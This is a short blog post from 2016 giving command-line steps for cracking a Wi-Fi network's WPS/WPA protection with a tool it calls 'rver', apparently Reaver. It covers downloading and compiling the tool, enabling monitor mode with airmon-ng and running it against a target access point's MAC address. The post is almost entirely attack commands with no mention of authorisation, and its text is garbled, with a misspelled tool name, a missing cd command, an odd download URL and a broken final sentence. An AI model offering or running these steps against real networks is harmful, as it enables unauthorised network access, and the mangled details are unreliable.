Thursday, May 26, 2016

How to WPS & WPA of wifi network using Rver


OS required Linux-backtrack


1. Get the rver
- wget https://rver-wps.google.com/files/rver-1.3.tar.gz

2. Extract and compile it.
- tar xzvf rver-1.3.tar.gz
- rver-1.3/src
- ./configure
- make
- make install


3. Change your wireless card to monitor mode
- airmon-ng start wlan0


4. Use rver
- rver -i mon0 -b <mac_address_wireless_access_point>


5. Waiting bcon from Wireless Access Point and finally you will found the !!!

No comments:

Post a Comment